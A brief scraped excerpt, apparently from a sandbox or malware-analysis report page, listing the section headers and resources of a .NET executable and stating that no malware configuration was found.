Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
yxz5h0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙